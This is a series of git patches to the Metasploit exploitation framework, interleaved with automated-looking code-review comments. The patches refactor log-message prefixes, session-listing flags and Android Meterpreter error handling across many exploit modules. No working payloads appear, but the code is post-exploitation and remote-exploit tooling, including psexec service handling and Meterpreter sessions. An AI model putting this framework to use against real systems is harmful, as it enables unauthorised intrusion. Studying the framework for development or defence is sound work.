b/lib/msf/core/exploit/tcp.rb @@ -195,6 +195,14 @@ module Exploit::Remote::Tcp disconnect end + def print_prefix + if rhost + super + peer + " - " + else + super + end + end + ## # # Wrappers for getters diff --git a/lib/msf/ui/console/module_command_dispatcher.rb b/lib/msf/ui/console/module_command_dispatcher.rb index 07bcef3693..a78b6f8107 100644 --- a/lib/msf/ui/console/module_command_dispatcher.rb +++ b/lib/msf/ui/console/module_command_dispatcher.rb 
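Review bot: Two of the messages rewritten in the psexec hunk still carry typos, `"Not removing service for persistance..."` and `"Successfully removed the sevice"`; since the lines are being touched anyway, fix them to `persistence` and `service`. These are the strings someone searches for when checking whether cleanup ran, so consistent spelling matters here. psexec starts above the hunk.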
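Review bot: `print_prefix` in the tcp.rb hunk calls `peer`, but no `peer` is defined in this hunk even though the commit title says it adds one and the Psexec copy is deleted in the same commit; confirm Tcp (or every includer) already defines it. The `if rhost` guard is also true for an empty string in Ruby, so an empty RHOST would yield a prefix like `:PORT - `; `if rhost && !rhost.empty?` is safer, assuming rhost is a String. Modules that still interpolate `#{peer} - ` themselves will print the host twice until they are cleaned up.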
@@ -193,13 +193,13 @@ module ModuleCommandDispatcher 'LocalOutput' => driver.output) if (code and code.kind_of?(Array) and code.length > 1) if (code == Msf::Exploit::CheckCode::Vulnerable) - print_good("#{peer} - #{code[1]}") + print_good("#{code[1]}") report_vuln(instance) else - print_status("#{peer} - #{code[1]}") + print_status("#{code[1]}") end else - msg = "#{peer} - Check failed: The state could not be determined." + msg = "Check failed: The state could not be determined." print_error(msg) elog("#{msg}\n#{caller.join("\n")}") end @@ -213,7 +213,7 @@ module ModuleCommandDispatcher print_error("Check failed: #{e.message}") elog("#{e.message}\n#{e.backtrace.join("\n")}") rescue ::Exception => e - print_error("#{peer} - Check failed: #{e.class} #{e}") + print_error("Check failed: #{e.class} #{e}") elog("#{e.message}\n#{e.backtrace.join("\n")}") end end diff --git a/lib/rex/proto/dcerpc/svcctl/packet.rb b/lib/rex/proto/dcerpc/svcctl/packet.rb index 6d27f6b849..7e65cb86cd 100644 --- a/lib/rex/proto/dcerpc/svcctl/packet.rb +++ b/lib/rex/proto/dcerpc/svcctl/packet.rb @@ -53,7 +53,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error getting scm handle: #{e}") + print_error("Error getting scm handle: #{e}") end [scm_handle, scm_status] @@ -124,7 +124,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error creating service: #{e}") + print_error("Error creating service: #{e}") end return svc_handle, svc_status @@ -149,7 +149,7 @@ class Client response = dcerpc_client.call(CHANGE_SERVICE_CONFIG2_W, stubdata) # ChangeServiceConfig2 svc_status = error_code(response) rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error changing service description : #{e}") + print_error("Error changing service description : #{e}") end svc_status 
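Review bot: Dropping `#{peer} - ` from the check-result messages assumes a prefix is added elsewhere, but these `print_good`/`print_status`/`print_error` calls sit in the console dispatcher, while the `print_prefix` added in this commit lives in the Tcp exploit mixin. If the dispatcher's print methods do not go through the module instance, a check run over several hosts loses which host each result refers to; either keep `print_good("#{peer} - #{code[1]}")` or route the output through the module. `"#{code[1]}"` is also a redundant interpolation; `code[1].to_s` says the same. This applies to both hunks in this file.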
@@ -169,7 +169,7 @@ class Client svc_status = error_code(response[20,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error closing service handle: #{e}") + print_error("Error closing service handle: #{e}") end svc_status @@ -195,7 +195,7 @@ class Client end end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error opening service handle: #{e}") + print_error("Error opening service handle: #{e}") end svc_handle @@ -219,7 +219,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error starting service: #{e}") + print_error("Error starting service: #{e}") end svc_status @@ -249,7 +249,7 @@ class Client svc_status = error_code(response[28,4]) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error controlling service: #{e}") + print_error("Error controlling service: #{e}") end svc_status @@ -268,7 +268,7 @@ class Client svc_status = error_code(response) end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end svc_status @@ -292,7 +292,7 @@ class Client ret = 2 end rescue Rex::Proto::DCERPC::Exceptions::Fault => e - print_error("#{peer} - Error deleting service: #{e}") + print_error("Error deleting service: #{e}") end ret From c2f8e954927eef921612c2ae2f486cf2021c3cfd Mon Sep 17 00:00:00 2001 From: James Lee Date: Thu, 28 Jan 2016 14:18:19 -0600 Subject: [PATCH 29/71] Missed one --- lib/msf/core/auxiliary/redis.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/auxiliary/redis.rb b/lib/msf/core/auxiliary/redis.rb index 20714c8eb3..3b0d3c6e8e 100644 --- a/lib/msf/core/auxiliary/redis.rb +++ b/lib/msf/core/auxiliary/redis.rb 
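Review bot: The message in the last svcctl hunk, `print_error("Error deleting service: #{e}")`, is identical to the one in the hunk before it, yet the surrounding code sets `ret` rather than `svc_status`, which suggests a different operation whose message was copied. The method name is outside the hunk, so this is a guess. If it is a status query, a message such as `"Error querying service status: #{e}"` would stop two different failures from looking the same in output.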
@@ -48,29 +48,29 @@ module Msf def redis_command(*commands) command_string = printable_redis_response(commands.join(' ')) unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end if /(?ERR operation not permitted|NOAUTH Authentication required)/i =~ command_response fail_with(::Msf::Module::Failure::BadConfig, "#{peer} requires authentication but Password unset") unless datastore['Password'] - vprint_status("#{peer} -- requires authentication (#{printable_redis_response(auth_response, false)})") + vprint_status("Requires authentication (#{printable_redis_response(auth_response, false)})") if (auth_response = send_redis_command('AUTH', datastore['Password'])) unless auth_response =~ /\+OK/ - vprint_error("#{peer} -- authentication failure: #{printable_redis_response(auth_response)}") + vprint_error("Authentication failure: #{printable_redis_response(auth_response)}") return end - vprint_status("#{peer} -- authenticated") + vprint_status("Authenticated") unless (command_response = send_redis_command(*commands)) - vprint_error("#{peer} -- no response to '#{command_string}'") + vprint_error("No response to '#{command_string}'") return end else - vprint_status("#{peer} -- authentication failed; no response") + vprint_status("Authentication failed; no response") return end end - vprint_status("#{peer} -- redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") + vprint_status("Redis command '#{command_string}' got '#{printable_redis_response(command_response)}'") command_response end From 7b4f3f8148966ed6f1d61b68b5c9ae2120c7ebce Mon Sep 17 00:00:00 2001 
From: OJ Date: Fri, 29 Jan 2016 11:52:21 +1000 Subject: [PATCH 30/71] Remove -vv, restore -v and add -ci --- lib/msf/base/serializer/readable_text.rb | 29 ++++++++++--------- lib/msf/ui/console/command_dispatcher/core.rb | 12 ++++---- 2 files changed, 21 insertions(+), 20 deletions(-) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 5b20981a9c..b93cd55bc0 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -524,20 +524,18 @@ class ReadableText def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false - extended = opts[:extended] || false + show_checkin = opts[:show_checkin] || false indent = opts[:indent] || DefaultIndent col = opts[:col] || DefaultColumnWrap return dump_sessions_verbose(framework, opts) if verbose - columns = - [ - 'Id', - 'Type', - 'Information', - 'Connection' - ] - columns << 'Checkin?' if extended + columns = [] + columns << 'Id' + columns << 'Type' + columns << 'Checkin?' if show_checkin + columns << 'Information' + columns << 'Connection' tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, @@ -553,12 +551,12 @@ class ReadableText sinfo = sinfo[0,77] + "..." end - row = [ session.sid.to_s, session.type.to_s, sinfo, session.tunnel_to_s + " (#{session.session_host})" ] - if session.respond_to?(:platform) - row[1] << (" " + session.platform) - end + row = [] + row << session.sid.to_s + row << session.type.to_s + row[-1] << (" " + session.platform) if session.respond_to?(:platform) - if extended + if show_checkin if session.respond_to?(:last_checkin) && session.last_checkin row << "#{(Time.now.to_i - session.last_checkin.to_i)}s ago" else @@ -566,6 +564,9 @@ class ReadableText end end + row << sinfo + row << session.tunnel_to_s + " (#{session.session_host})" + tbl << row } 
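Review bot: In the row-building hunk, `row[-1] << (" " + session.platform) if session.respond_to?(:platform)` raises TypeError when a session responds to `platform` but returns nil, which would abort the whole session listing; whether that can happen is not visible here. `row[-1] << " #{session.platform}" if session.respond_to?(:platform) && session.platform` is safe. The `<<` also appends in place to whatever `session.type.to_s` returned, so if `type` ever hands back a stored String the session's own value is mutated; `session.type.to_s.dup` avoids that.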
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e129744ff3..d5080f9f40 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -35,11 +35,11 @@ class Core # Session command options @@sessions_opts = Rex::Parser::Arguments.new( "-c" => [ true, "Run a command on the session given with -i, or all" ], + "-ci" => [ false, "Show the last checkin time in the session table" ], "-h" => [ false, "Help banner" ], "-i" => [ true, "Interact with the supplied session ID " ], "-l" => [ false, "List all active sessions" ], - "-v" => [ false, "List extended fields" ], - "-vv" => [ false, "Render in verbose mode" ], + "-v" => [ false, "List sessions in verbose mode" ], "-q" => [ false, "Quiet mode" ], "-k" => [ true, "Terminate sessions by session ID and/or range" ], "-K" => [ false, "Terminate all sessions" ], @@ -1760,7 +1760,7 @@ class Core begin method = nil quiet = false - extended = false + show_checkin = false verbose = false sid = nil cmds = [] @@ -1781,9 +1781,9 @@ class Core when "-c" method = 'cmd' cmds << val if val + when "-ci" + show_checkin = true when "-v" - extended = true - when "-vv" verbose = true # Do something with the supplied session identifier instead of # all sessions. @@ -2045,7 +2045,7 @@ class Core end when 'list',nil print_line - print(Serializer::ReadableText.dump_sessions(framework, :extended => extended, :verbose => verbose)) + print(Serializer::ReadableText.dump_sessions(framework, :show_checkin => show_checkin, :verbose => verbose)) print_line end From 4d6791d4323ab3593e725b77f857b6c72f9eed40 Mon Sep 17 00:00:00 2001 
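Review bot: The new `-ci` flag reads like the bundled short options `-c -i` to anyone used to getopt conventions, and both `-c` and `-i` exist here and take an argument, so `sessions -ci 1` is easy to misread or mistype. A single unused letter or a spelled-out name would be less ambiguous. How Rex::Parser::Arguments matches multi-character flags is outside this diff, so a test that `-c` followed by a value and `-ci` are told apart would be worth adding.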
From: Tim Date: Sun, 31 Jan 2016 15:13:21 +0000 Subject: [PATCH 31/71] fix returning of error --- lib/rex/post/meterpreter/extensions/android/android.rb | 6 +++++- lib/rex/post/meterpreter/extensions/android/tlv.rb | 1 + .../meterpreter/ui/console/command_dispatcher/android.rb | 7 ++++++- 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 32cc0f9af7..800204d726 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -246,7 +246,11 @@ class Android < Extension request = Packet.create_request('activity_start') request.add_tlv(TLV_TYPE_URI_STRING, uri) response = client.send_request(request) - response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value + if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value + return nil + else + return response.get_tlv(TLV_TYPE_ACTIVITY_START_ERROR).value + end end def send_sms(dest, body, dr) diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 54cfa1488b..babbec853a 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb @@ -78,6 +78,7 @@ TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) +TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index d72044d9ec..4c6e39e4f4 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb 
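Review bot: Both `get_tlv(...).value` calls in the new `activity_start` body dereference the result without a nil check, so a response that lacks `TLV_TYPE_ACTIVITY_START_RESULT` or, on failure, the new `TLV_TYPE_ACTIVITY_START_ERROR` (for example from a payload built before this TLV existed) raises NoMethodError instead of reporting an error. Using `response.get_tlv_value(TLV_TYPE_ACTIVITY_START_RESULT)` and `response.get_tlv_value(TLV_TYPE_ACTIVITY_START_ERROR) || 'unknown error'` keeps the contract, and the fallback matters because the console caller treats a nil return as "Intent started". A one-line comment stating "nil on success, error String otherwise" would also help, since that inverts the usual convention.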
@@ -538,7 +538,12 @@ class Console::CommandDispatcher::Android end uri = args[0] - client.android.activity_start(uri) + result = client.android.activity_start(uri) + if result.nil? + print_status("Intent started") + else + print_error("Error: #{result}") + end end # From 12256a642342c31d5a7d1a25fbe499ec708700bd Mon Sep 17 00:00:00 2001 
From: James Lee Date: Mon, 1 Feb 2016 15:12:03 -0600 Subject: [PATCH 32/71] Remove now-redundant peer These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient --- .../freebsd/misc/citrix_netscaler_soap_bof.rb | 2 +- .../linux/antivirus/escan_password_exec.rb | 6 +-- .../http/advantech_switch_bash_env_exec.rb | 10 ++-- .../linux/http/airties_login_cgi_bof.rb | 4 +- .../linux/http/alienvault_sqli_exec.rb | 40 +++++++-------- .../exploits/linux/http/astium_sqli_upload.rb | 20 ++++---- .../exploits/linux/http/belkin_login_bof.rb | 4 +- .../exploits/linux/http/centreon_sqli_exec.rb | 2 +- .../http/dlink_authentication_cgi_bof.rb | 4 +- .../linux/http/dlink_dcs931l_upload.rb | 18 +++---- .../linux/http/dlink_dir605l_captcha_bof.rb | 2 +- .../http/dlink_dspw110_cookie_noauth_exec.rb | 6 +-- .../linux/http/dlink_dspw215_info_cgi_bof.rb | 4 +- .../linux/http/dlink_hedwig_cgi_bof.rb | 4 +- modules/exploits/linux/http/dlink_hnap_bof.rb | 4 +- .../http/dlink_hnap_header_exec_noauth.rb | 4 +- .../linux/http/dlink_upnp_exec_noauth.rb | 4 +- .../exploits/linux/http/dolibarr_cmd_exec.rb | 12 ++--- modules/exploits/linux/http/esva_exec.rb | 8 +-- .../exploits/linux/http/fritzbox_echo_exec.rb | 4 +- .../linux/http/groundwork_monarch_cmd_exec.rb | 6 +-- modules/exploits/linux/http/kloxo_sqli.rb | 16 +++--- .../linux/http/linksys_themoon_exec.rb | 4 +- .../linux/http/multi_ncc_ping_exec.rb | 10 ++-- .../linux/http/mutiny_frontend_upload.rb | 10 ++-- .../linux/http/netgear_readynas_exec.rb | 2 +- .../exploits/linux/http/nginx_chunked_size.rb | 14 +++--- .../linux/http/openfiler_networkcard_exec.rb | 8 +-- .../exploits/linux/http/pandora_fms_exec.rb | 8 +-- .../exploits/linux/http/pandora_fms_sqli.rb | 48 +++++++++--------- .../http/realtek_miniigd_upnp_exec_noauth.rb | 4 +- .../linux/http/seagate_nas_php_exec_noauth.rb | 34 ++++++------- .../linux/http/smt_ipmi_close_window_bof.rb | 2 +- .../linux/http/symantec_web_gateway_exec.rb | 4 +- 
.../http/symantec_web_gateway_file_upload.rb | 8 +-- .../linux/http/symantec_web_gateway_lfi.rb | 6 +-- .../synology_dsm_sliceupload_exec_noauth.rb | 12 ++--- .../linux/http/vap2500_tools_command_exec.rb | 8 +-- modules/exploits/linux/http/wanem_exec.rb | 12 ++--- .../linux/http/webcalendar_settings_exec.rb | 4 +- .../exploits/linux/http/webid_converter.rb | 14 +++--- modules/exploits/linux/http/zabbix_sqli.rb | 18 +++---- .../linux/http/zen_load_balancer_exec.rb | 6 +-- .../http/zenoss_showdaemonxmlconfig_exec.rb | 12 ++--- .../exploits/linux/misc/zabbix_server_exec.rb | 16 +++--- .../linux/smtp/exim_gethostbyname_bof.rb | 2 +- .../multi/elasticsearch/script_mvel_rce.rb | 18 +++---- .../elasticsearch/search_groovy_script.rb | 20 ++++---- .../http/ajaxplorer_checkinstall_exec.rb | 6 +-- .../multi/http/apprain_upload_exec.rb | 8 +-- .../multi/http/auxilium_upload_exec.rb | 8 +-- .../exploits/multi/http/bolt_file_upload.rb | 18 +++---- .../multi/http/caidao_php_backdoor_exec.rb | 2 +- .../exploits/multi/http/cisco_dcnm_upload.rb | 4 +- modules/exploits/multi/http/coldfusion_rds.rb | 24 ++++----- .../exploits/multi/http/cups_bash_env_exec.rb | 30 +++++------ .../multi/http/cuteflow_upload_exec.rb | 6 +-- .../multi/http/dexter_casinoloader_exec.rb | 18 +++---- .../exploits/multi/http/drupal_drupageddon.rb | 26 +++++----- .../multi/http/eventlog_file_upload.rb | 14 +++--- .../multi/http/extplorer_upload_exec.rb | 26 +++++----- .../multi/http/glossword_upload_exec.rb | 22 ++++---- .../multi/http/hp_sitescope_issuesiebelcmd.rb | 4 +- .../http/hp_sitescope_uploadfileshandler.rb | 28 +++++------ .../exploits/multi/http/hp_sys_mgmt_exec.rb | 6 +-- .../multi/http/hyperic_hq_script_console.rb | 32 ++++++------ .../multi/http/kordil_edms_upload_exec.rb | 8 +-- .../multi/http/log1cms_ajax_create_folder.rb | 4 +- .../multi/http/manage_engine_dc_pmp_sqli.rb | 26 +++++----- .../multi/http/manageengine_auth_upload.rb | 12 ++--- .../multi/http/manageengine_sd_uploader.rb | 4 +- 
.../multi/http/mma_backdoor_upload.rb | 4 +- .../multi/http/mobilecartly_upload_exec.rb | 6 +-- .../multi/http/movabletype_upgrade_exec.rb | 4 +- .../multi/http/mutiny_subnetmask_exec.rb | 36 ++++++------- .../multi/http/nibbleblog_file_upload.rb | 16 +++--- .../http/opmanager_socialit_file_upload.rb | 12 ++--- .../exploits/multi/http/oracle_reports_rce.rb | 50 +++++++++---------- .../multi/http/pandora_upload_exec.rb | 8 +-- .../multi/http/php_volunteer_upload_exec.rb | 22 ++++---- .../exploits/multi/http/phpfilemanager_rce.rb | 4 +- .../multi/http/phpwiki_ploticus_exec.rb | 2 +- .../multi/http/polarcms_upload_exec.rb | 4 +- .../exploits/multi/http/processmaker_exec.rb | 20 ++++---- .../exploits/multi/http/qdpm_upload_exec.rb | 24 ++++----- .../rocket_servergraph_file_requestor_rce.rb | 22 ++++---- .../exploits/multi/http/sflog_upload_exec.rb | 12 ++--- .../solarwinds_store_manager_auth_filter.rb | 18 +++---- .../multi/http/sonicwall_gms_upload.rb | 10 ++-- .../http/struts_code_exec_classloader.rb | 16 +++--- .../multi/http/struts_code_exec_parameters.rb | 4 +- .../multi/http/sysaid_auth_file_upload.rb | 12 ++--- .../multi/http/sysaid_rdslogs_file_upload.rb | 12 ++--- .../multi/http/testlink_upload_exec.rb | 50 +++++++++---------- .../exploits/multi/http/tomcat_mgr_upload.rb | 34 ++++++------- .../multi/http/uptime_file_upload_1.rb | 6 +-- .../multi/http/vbulletin_unserialize.rb | 4 +- .../http/visual_mining_netcharts_upload.rb | 6 +-- .../exploits/multi/http/vtiger_soap_upload.rb | 6 +-- .../multi/http/webpagetest_upload_exec.rb | 8 +-- .../exploits/multi/http/wikka_spam_exec.rb | 6 +-- ...enworks_configuration_management_upload.rb | 8 +-- .../misc/hp_data_protector_exec_integutil.rb | 18 +++---- .../exploits/multi/misc/java_jdwp_debugger.rb | 38 +++++++------- .../exploits/multi/misc/java_jmx_server.rb | 46 ++++++++--------- .../exploits/multi/misc/java_rmi_server.rb | 4 +- .../exploits/unix/ftp/proftpd_modcopy_exec.rb | 2 +- 
.../unix/http/vmturbo_vmtadmin_exec_noauth.rb | 10 ++-- .../webapp/actualanalyzer_ant_cookie_exec.rb | 38 +++++++------- .../unix/webapp/arkeia_upload_exec.rb | 12 ++--- .../unix/webapp/clipbucket_upload_exec.rb | 10 ++-- .../unix/webapp/datalife_preview_exec.rb | 2 +- .../unix/webapp/egallery_upload_exec.rb | 8 +-- .../unix/webapp/flashchat_upload_exec.rb | 8 +-- .../unix/webapp/freepbx_config_exec.rb | 8 +-- .../unix/webapp/get_simple_cms_upload_exec.rb | 14 +++--- .../exploits/unix/webapp/hastymail_exec.rb | 12 ++--- .../unix/webapp/havalite_upload_exec.rb | 8 +-- .../unix/webapp/horde_unserialize_exec.rb | 4 +- .../webapp/hybridauth_install_php_exec.rb | 28 +++++------ .../invision_pboard_unserialize_exec.rb | 18 +++---- .../unix/webapp/joomla_akeeba_unserialize.rb | 6 +-- .../webapp/joomla_contenthistory_sqli_rce.rb | 22 ++++---- .../unix/webapp/joomla_media_upload_exec.rb | 18 +++---- modules/exploits/unix/webapp/kimai_sqli.rb | 38 +++++++------- .../unix/webapp/libretto_upload_exec.rb | 8 +-- .../webapp/maarch_letterbox_file_upload.rb | 10 ++-- .../unix/webapp/narcissus_backend_exec.rb | 8 +-- .../webapp/open_flash_chart_upload_exec.rb | 12 ++--- .../webapp/openemr_sqli_privesc_upload.rb | 16 +++--- .../unix/webapp/openemr_upload_exec.rb | 12 ++--- .../unix/webapp/opensis_modname_exec.rb | 12 ++--- .../exploits/unix/webapp/php_charts_exec.rb | 8 +-- .../unix/webapp/projectpier_upload_exec.rb | 8 +-- .../unix/webapp/projectsend_upload_exec.rb | 30 +++++------ .../unix/webapp/seportal_sqli_exec.rb | 20 ++++---- .../webapp/simple_e_document_upload_exec.rb | 14 +++--- .../sixapart_movabletype_storable_exec.rb | 16 +++--- .../unix/webapp/skybluecanvas_exec.rb | 4 +- .../unix/webapp/sugarcrm_unserialize_exec.rb | 12 ++--- .../unix/webapp/tikiwiki_unserialize_exec.rb | 18 +++---- .../unix/webapp/tuleap_unserialize_exec.rb | 6 +-- .../unix/webapp/vbulletin_vote_sqli_exec.rb | 46 ++++++++--------- .../webapp/vicidial_manager_send_cmd_exec.rb | 10 ++-- 
.../unix/webapp/webmin_show_cgi_exec.rb | 24 ++++----- .../exploits/unix/webapp/webtester_exec.rb | 10 ++-- .../unix/webapp/wp_admin_shell_upload.rb | 10 ++-- .../webapp/wp_ajax_load_more_file_upload.rb | 10 ++-- .../webapp/wp_asset_manager_upload_exec.rb | 4 +- .../wp_creativecontactform_file_upload.rb | 4 +- .../unix/webapp/wp_downloadmanager_upload.rb | 6 +-- .../wp_easycart_unrestricted_file_upload.rb | 24 ++++----- .../unix/webapp/wp_foxypress_upload.rb | 8 +-- .../webapp/wp_frontend_editor_file_upload.rb | 6 +-- .../webapp/wp_holding_pattern_file_upload.rb | 6 +-- .../wp_inboundio_marketing_file_upload.rb | 4 +- .../unix/webapp/wp_infusionsoft_upload.rb | 4 +- .../webapp/wp_nmediawebsite_file_upload.rb | 4 +- .../unix/webapp/wp_optimizepress_upload.rb | 8 +-- ..._photo_gallery_unrestricted_file_upload.rb | 18 +++---- .../unix/webapp/wp_pixabay_images_upload.rb | 10 ++-- .../exploits/unix/webapp/wp_platform_exec.rb | 2 +- .../unix/webapp/wp_property_upload_exec.rb | 4 +- .../webapp/wp_reflexgallery_file_upload.rb | 4 +- .../webapp/wp_revslider_upload_execute.rb | 4 +- .../unix/webapp/wp_slideshowgallery_upload.rb | 10 ++-- .../unix/webapp/wp_symposium_shell_upload.rb | 14 +++--- .../unix/webapp/wp_total_cache_exec.rb | 22 ++++---- .../unix/webapp/wp_worktheflow_upload.rb | 4 +- .../webapp/wp_wpshop_ecommerce_file_upload.rb | 4 +- .../unix/webapp/wp_wptouch_file_upload.rb | 20 ++++---- .../webapp/wp_wysija_newsletters_upload.rb | 6 +-- .../exploits/unix/webapp/xoda_file_upload.rb | 8 +-- .../exploits/unix/webapp/zeroshell_exec.rb | 10 ++-- modules/exploits/unix/webapp/zimbra_lfi.rb | 14 +++--- .../webapp/zoneminder_packagecontrol_exec.rb | 14 +++--- .../unix/webapp/zpanel_username_exec.rb | 10 ++-- .../symantec_endpoint_manager_rce.rb | 2 +- .../symantec_workspace_streaming_exec.rb | 6 +-- .../exploits/windows/ftp/freefloatftp_wbem.rb | 18 +++---- .../exploits/windows/ftp/open_ftpd_wbem.rb | 12 ++--- .../windows/ftp/quickshare_traversal_write.rb | 14 +++--- 
.../windows/ftp/wing_ftp_admin_exec.rb | 4 +- .../http/avaya_ccr_imageupload_exec.rb | 20 ++++---- .../windows/http/cogent_datahub_command.rb | 8 +-- .../exploits/windows/http/cyclope_ess_sqli.rb | 12 ++--- .../http/desktopcentral_file_upload.rb | 10 ++-- .../desktopcentral_statusupdate_upload.rb | 10 ++-- .../http/efs_easychatserver_username.rb | 10 ++-- .../windows/http/efs_fmws_userid_bof.rb | 12 ++--- .../windows/http/ericom_access_now_bof.rb | 2 +- .../http/generic_http_dll_injection.rb | 2 +- .../http/hp_autopass_license_traversal.rb | 8 +-- .../windows/http/hp_imc_bims_upload.rb | 6 +-- .../windows/http/hp_imc_mibfileupload.rb | 6 +-- .../http/hp_loadrunner_copyfiletoserver.rb | 34 ++++++------- .../exploits/windows/http/hp_mpa_job_acct.rb | 10 ++-- .../http/hp_pcm_snac_update_certificates.rb | 6 +-- .../windows/http/hp_pcm_snac_update_domain.rb | 6 +-- .../windows/http/hp_sitescope_dns_tool.rb | 10 ++-- .../http/hp_sitescope_runomagentcommand.rb | 2 +- .../windows/http/jira_collector_traversal.rb | 14 +++--- .../exploits/windows/http/kaseya_uploader.rb | 4 +- .../http/kaseya_uploadimage_file_upload.rb | 6 +-- .../landesk_thinkmanagement_upload_asp.rb | 18 +++---- .../http/lexmark_markvision_gfd_upload.rb | 14 +++--- .../http/manage_engine_opmanager_rce.rb | 14 +++--- .../windows/http/miniweb_upload_wbem.rb | 6 +-- .../exploits/windows/http/novell_mdm_lfi.rb | 14 +++--- .../windows/http/oracle_btm_writetofile.rb | 20 ++++---- .../windows/http/oracle_endeca_exec.rb | 4 +- .../http/oracle_event_processing_upload.rb | 8 +-- .../exploits/windows/http/rejetto_hfs_exec.rb | 2 +- .../windows/http/sap_host_control_cmd_exec.rb | 12 ++--- .../windows/http/sepm_auth_bypass_rce.rb | 8 +-- .../http/sonicwall_scrutinizer_sqli.rb | 8 +-- .../windows/http/trackit_file_upload.rb | 6 +-- .../windows/http/umbraco_upload_aspx.rb | 32 ++++++------ .../http/vmware_vcenter_chargeback_upload.rb | 14 +++--- .../windows/misc/bigant_server_dupf_upload.rb | 12 ++--- 
.../windows/misc/hp_dataprotector_cmd_exec.rb | 4 +- .../windows/misc/hp_dataprotector_exec_bar.rb | 4 +- .../misc/hp_dataprotector_traversal.rb | 6 +-- .../misc/hp_operations_agent_coda_34.rb | 10 ++-- .../misc/hp_operations_agent_coda_8c.rb | 10 ++-- .../misc/ibm_director_cim_dllinject.rb | 6 +-- .../manageengine_eventlog_analyzer_rce.rb | 18 +++---- .../windows/misc/ms10_104_sharepoint.rb | 14 +++--- .../windows/misc/sap_netweaver_dispatcher.rb | 6 +-- ...dworks_workgroup_pdmwservice_file_write.rb | 16 +++--- modules/exploits/windows/mysql/mysql_mof.rb | 14 +++--- .../exploits/windows/mysql/mysql_start_up.rb | 4 +- .../novell/file_reporter_fsfui_upload.rb | 8 +-- .../scada/ge_proficy_cimplicity_gefebt.rb | 8 +-- modules/exploits/windows/smb/psexec.rb | 2 +- modules/exploits/windows/smb/psexec_psh.rb | 2 +- 236 files changed, 1400 insertions(+), 1400 deletions(-) diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb index 4bd783ad7b..b204008a4a 100644 --- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb +++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - print_status("#{peer} - Sending soap request...") + print_status("Sending soap request...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/linux/antivirus/escan_password_exec.rb b/modules/exploits/linux/antivirus/escan_password_exec.rb index d6236e994b..ed93ca2559 100644 --- a/modules/exploits/linux/antivirus/escan_password_exec.rb +++ b/modules/exploits/linux/antivirus/escan_password_exec.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def cmd_exec(session, cmd) case session.type when /meterpreter/ - print_warning("#{peer} - Use a shell payload in order to get root!") + print_warning("Use a shell payload in order to get root!") when /shell/ o = session.shell_command_token(cmd) o.chomp! if o 
